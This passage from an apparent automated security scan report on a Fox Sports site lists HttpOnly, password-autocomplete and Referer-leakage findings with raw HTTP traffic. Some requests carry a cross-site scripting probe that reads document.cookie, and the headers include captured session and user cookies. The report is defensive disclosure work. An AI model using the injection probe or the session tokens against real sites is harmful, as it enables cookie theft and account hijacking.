pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Content-Length: 0
Expires: Sat, 08 Jan 2011 00:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:30:34 GMT
Connection: close
Set-Cookie: pALERTED=TRUE; Domain=.foxsports.com; Expires=Mon, 07-Feb-2011 00:30:34 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Path=/
Set-Cookie: pLMD="2011-01-08 00:29:40"; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; Domain=.foxsports.com; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Path=/
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/


8.8. http://msn.foxsports.com/fantasy/basketball/hotstreak/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/basketball/hotstreak/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27381
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKsceEx4Px8ipDX7pZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8.9. http://msn.foxsports.com/fantasy/football/frankspicks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/football/frankspicks/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24812
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscei73uaW8KKlbpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

9. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


9.1. http://msn.foxsports.com/account/regPopup  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/regPopup

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /account/regPopup?divId=registration&efsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 13026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div id="passwordChangeStart">
<form class="popupForm" name="createPassword" action='https://s.foxsports.com/account/createPassword' method="post" onSubmit="submitForm(this, {type: 'password-change', beginDiv: 'passwordChangeStart', returnDiv:'passwordChangeSuccess'}); return false;">
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="password" class="password" title="Password" />
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="newPassword" class="password" title="Password" />
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="newPasswordAgain" class="password" title="Password" />
<div class="statusMessage">
...[SNIP]...

9.2. http://msn.foxsports.com/account/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="registration tab-container">

<form id="my-account-form" name="my-account-form" onsubmit="submitMe(); return false;" action="https://s.foxsports.com/account/registration" method="post" class="account-form">
<input type="hidden" name="euid" value="" id="my-account-form_euid"/>
...[SNIP]...
</label>
<input type="password" name="user.fscomPassword" id="password" title="Password" onfocus="clearDefaultFormValues(this);"/>
<br />
...[SNIP]...

10. Cross-domain Referer leakage  previous  next
There are 44 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://msn.foxsports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
